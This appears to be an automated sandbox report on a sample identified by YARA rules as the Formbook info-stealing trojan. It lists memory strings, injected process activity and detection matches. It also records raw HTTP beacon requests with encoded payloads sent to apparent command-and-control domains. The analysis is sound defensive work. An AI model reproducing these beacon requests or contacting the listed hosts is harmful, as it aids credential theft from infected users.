          Source: explorer.exe, 00000003.00000000.1656205865.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4099182802.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=quailrun-inc.com
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
          Source: unknownDNS traffic detected: queries for: www.quailrun-inc.com
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5D8F82 getaddrinfo,setsockopt,recv,3_2_0E5D8F82
          Source: global trafficHTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=/VQHqX0ksQJGmUtuF+SmenrWXhlVL4nIAkrjzD1bv3XMK1Eb428apYspiXxzNiZFnR1c HTTP/1.1Host: www.quailrun-inc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?P6=aEvA5DdolFnSpG3wqqUvIRZQPhFuP/nqnfvGSsdAIfGqv2pNtxEQnoAbm37B6N+rsMpI&ntxh9=V48LzvX0 HTTP/1.1Host: www.bollywood.nexusConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2 HTTP/1.1Host: www.lpqxmz.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=ZsWAow+yf8BBfalQduY7CMj5L6CLJOwgwJ6AETMAgkoaDSvJRnGnN78buAKwp8K6m6Gx HTTP/1.1Host: www.therealnikib.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?P6=Td1U1SjQUadfC3cbiTsqgzapHPyB/huuK+NgSE3DJAe+OSZ8lo2ZhtJstkIbAvBbRddo&ntxh9=V48LzvX0 HTTP/1.1Host: www.slotjitu88.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=+hA7uXL5jVPzGINsph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflq2ofsafzQv HTTP/1.1Host: www.iqixuehe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?P6=tOmE+Tzzb7HQLc2SkeB2EXcbcJrVSgBrP2Nr0WPSkAyRu+Yjx9aruD7HNlgfCbohliLP&ntxh9=V48LzvX0 HTTP/1.1Host: www.candicrem.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8e HTTP/1.1Host: www.therenixgroupllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?P6=sJ+Ygj3voyzHV2SMJ+QMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocPRS2y/b4Gk&ntxh9=V48LzvX0 HTTP/1.1Host: www.7141999.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=YIoXQxIAORK6HEHBIjyMxPOX2glibAcKMS7MvCp7xLT7Ek+j4imqU/IlDY2a3gBqxYgb HTTP/1.1Host: www.pacersun.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: 881SP1exr1.exe PID: 7264, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: 881SP1exr1.exe PID: 7420, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: chkdsk.exe PID: 7464, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.881SP1exr1.exe.2f52da4.1.raw.unpack, .csLarge array initialization: : array initializer size 7534
          Source: 0.2.881SP1exr1.exe.2f25094.2.raw.unpack, .csLarge array initialization: : array initializer size 7534
          Source: 0.2.881SP1exr1.exe.5930000.13.raw.unpack, .csLarge array initialization: : array initializer size 7534
          Source: 881SP1exr1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: 881SP1exr1.exe PID: 7264, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: 881SP1exr1.exe PID: 7420, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: chkdsk.exe PID: 7464, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 0_2_015ED55C0_2_015ED55C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 0_2_078D18E80_2_078D18E8
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 0_2_078D18D90_2_078D18D9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041E0062_2_0041E006
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041D5632_2_0041D563
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041DE6A2_2_0041DE6A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A81582_2_014A8158
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014101002_2_01410100
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BA1182_2_014BA118
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D81CC2_2_014D81CC
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E01AA2_2_014E01AA
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D41A22_2_014D41A2
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B20002_2_014B2000
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DA3522_2_014DA352
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E03E62_2_014E03E6
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142E3F02_2_0142E3F0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C02742_2_014C0274
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A02C02_2_014A02C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014205352_2_01420535
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E05912_2_014E0591
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D24462_2_014D2446
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C44202_2_014C4420
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014CE4F62_2_014CE4F6
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014447502_2_01444750
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014207702_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141C7C02_2_0141C7C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143C6E02_2_0143C6E0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014369622_2_01436962
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A02_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014EA9A62_2_014EA9A6
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014228402_2_01422840
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142A8402_2_0142A840
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144E8F02_2_0144E8F0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014068B82_2_014068B8
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DAB402_2_014DAB40
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D6BD72_2_014D6BD7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141EA802_2_0141EA80
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142AD002_2_0142AD00
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BCD1F2_2_014BCD1F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141ADE02_2_0141ADE0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01438DBF2_2_01438DBF
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420C002_2_01420C00
